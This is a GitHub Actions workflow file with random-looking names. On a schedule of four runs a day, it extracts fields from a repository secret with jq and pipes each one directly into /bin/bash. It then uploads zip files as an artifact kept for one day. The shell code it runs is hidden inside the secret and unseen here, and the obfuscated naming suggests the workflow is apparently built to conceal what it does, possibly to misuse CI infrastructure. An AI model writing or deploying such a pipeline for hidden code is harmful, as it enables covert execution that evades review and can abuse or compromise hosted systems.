name: yinxinruizhong
on:
  workflow_dispatch:

  schedule:
    - cron: '25 1,7,13,19 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yinxinruizhong
        env:
          lfrj23603: ${{ secrets.lfrj23603 }}
        run: |
          printf '%s' "$lfrj23603" | jq -r .vvp4 | /bin/bash
          echo $vix13 | jq -r .neab27924 | /bin/bash
          printf '%s' "$o907" | jq -r .hda934 | /bin/bash
          printf '%s' "$e1" | jq -r .ozire05524 | /bin/bash
          echo $l11 | jq -r .yjvql0 | /bin/bash
          echo $l93 | jq -r .vftl31 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: AvsM2lo6
          path: "*.zip"
          retention-days: 1
